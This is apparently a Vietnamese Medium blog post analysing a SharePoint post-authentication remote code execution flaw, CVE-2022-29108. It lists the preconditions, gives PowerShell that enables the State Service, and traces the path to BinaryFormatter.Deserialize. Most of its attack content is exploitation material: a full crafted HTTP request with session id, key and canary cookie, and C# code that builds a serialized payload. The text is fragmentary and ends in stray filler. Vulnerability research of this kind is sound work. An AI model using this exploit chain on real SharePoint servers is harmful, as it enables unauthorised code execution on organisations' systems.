Bình mới rượu cũ và Sharepoint Post-Auth RCE (CVE-2022–29108)

  • Điều kiện đầu tiên đó là tính năng “Self-Service Site Creation” bị disable by default, như vậy có nghĩa là một user bình thường với config mặc định sẽ không thể create các sub-site được ¯_(ツ)_/¯
  • Điều kiện thứ hai đó là CVE-2022–22005 hoạt động dựa vào State-Service của Sharepoint, tính năng này hoàn toàn không tồn tại với một default setup. Đây là một cảnh báo lỗi sẽ gặp trong trường hợp State-Service chưa được bật:
#Create new "State Service" application
$StateService_application = New-SPStateServiceApplication -Name "State Service"
#Create DB for State Service Application
$StateService_applicationDB= New-SPStateServiceDatabase -Name "KnowledgeJunction_SP_StateService" -ServiceApplication $StateService_application
#Create proxy for State Service application
New-SPStateServiceApplicationProxy -Name "KnowledgeJunction_SP_StateService" -ServiceApplication $StateService_application -DefaultProxyGroup
Initialize-SPStateServiceDatabase -Identity $StateService_applicationDB
ChartPreviewImage.Render()
> ChartAdminPageBase.FetchFromCurrentWorkingSet()
> ChartAdminPageBase.get_currentWorkingSet()
> BinaryFormatter.Deserialize()
  • Step 1: stored the payload Đầu tiên là phải download và cài đặt Microsoft InfoPath tại đây.
  • Step 2: Get the payload session id
GET /_layouts/15/formserverattachments.aspx?fid=1&sid=AF43TO7UGLAA4TVXQCDXC4WIQFTCAL2MNFZXI4ZPORSXG5BRGEYS6SLUMVWS65DFNVYGYYLUMUXHQ43OFNBXQ53RGRYDISTOJN2VSMTIONCFC4DVG5AWE5K2JBIVCM2HJRHUOOLUNZBU4SSHOJNDEYY=TC6s5QU93BoIZJdquPLcFPGQeeyGztEj4/i9xhD6rw4waUi3tnI60RaX09aC3H70OnD6cKSOK8Bsf4j1b/MmCw==|637879277981015089&key=BAIkY2UyMTcyNmQtNDNmZi00MWEzLTkyMDQtOTgxYTE5ZTc1ODI3QWU5ZjUxYmM2YTgxNzRiNmViMWM3Y2ZhZTY3NmJlNGFkX2UzOWQwYzgyZDAyZjRhYzc4NjQ5NWE5OTA1NjJkYzg0gAhF&dl=ip HTTP/1.1
Host: sharepoint
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Cookie: _InfoPath_CanaryValueAF43TO7UGLAA4TVXQCDXC4WIQFTCAL2MNFZXI4ZPORSXG5BRGEYS6SLUMVWS65DFNVYGYYLUMUXHQ43OFNBXQ53RGRYDISTOJN2VSMTIONCFC4DVG5AWE5K2JBIVCM2HJRHUOOLUNZBU4SSHOJNDEYY=TC6s5QU93BoIZJdquPLcFPGQeeyGztEj4/i9xhD6rw4waUi3tnI60RaX09aC3H70OnD6cKSOK8Bsf4j1b/MmCw==|637879277981015089;
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: Keep-Alive
AF43TO7UGLAA4TVXQCDXC4WIQFTCAL2MNFZXI4ZPORSXG5BRGEYS6SLUMVWS65DFNVYGYYLUMUXHQ43OFNBXQ53RGRYDISTOJN2VSMTIONCFC4DVG5AWE5K2JBIVCM2HJRHUOOLUNZBU4SSHOJNDEYY=TC6s5QU93BoIZJdquPLcFPGQeeyGztEj4/i9xhD6rw4waUi3tnI60RaX09aC3H70OnD6cKSOK8Bsf4j1b/MmCw==|637879277981015089
static void Main()
{
MemoryStream ms = new MemoryStream();
EnhancedBinaryWriter enhancedBinaryWriter = new EnhancedBinaryWriter(ms);
enhancedBinaryWriter._state = 4;
enhancedBinaryWriter._dataType = 2;
enhancedBinaryWriter._itemId = "ce21726d-43ff-41a3-9204-981a19e75827";
enhancedBinaryWriter._serializedKey = "e9f51bc6a8174b6eb1c7cfae676be4ad_e39d0c82d02f4ac786495a990562dc84";
enhancedBinaryWriter._size = 1024;
enhancedBinaryWriter._version = 69;
enhancedBinaryWriter.Serialize(enhancedBinaryWriter);
var base64String = Convert.ToBase64String(ms.ToArray());
Console.WriteLine(base64String);
}

--

--

asdasd asdasdasd asdasdasd

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store